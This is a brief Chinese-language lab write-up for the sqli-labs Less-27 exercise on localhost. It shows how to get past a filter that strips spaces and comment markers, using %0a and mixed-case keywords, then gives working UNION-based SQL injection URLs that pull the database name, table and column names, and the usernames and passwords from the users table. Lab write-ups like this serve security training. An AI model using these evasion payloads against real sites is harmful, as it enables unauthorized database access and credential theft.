sqli-less27过滤注入
一、检查网站
127.0.0.1/sqli/less-27/?id=1'
1、可以发现空格被过滤了
空格的部分替换方法:/%0a/、%0a、%09
2、–+也被过滤了
可以选择封装代码:简单来说就是代码结尾加上 ,’
二、爆数据库名
编写思路:1、过滤部分(空格,–+,大小写)2、查询思路
?id=0%27%0aUNIon%0aSElect%0a1,database(),%27
三、爆表名
id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security'),%27
四、爆字段名
id=0%27%0aUNIon%0aSElect%0a1,(SElect%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema='security'%0aand%0atable_name='users'),'
五、爆数据
id=0%27%0aUNIon%0aSELect%0a1,(SELect%0agroup_concat(id,username,password)%0afrom%0asecurity.users),'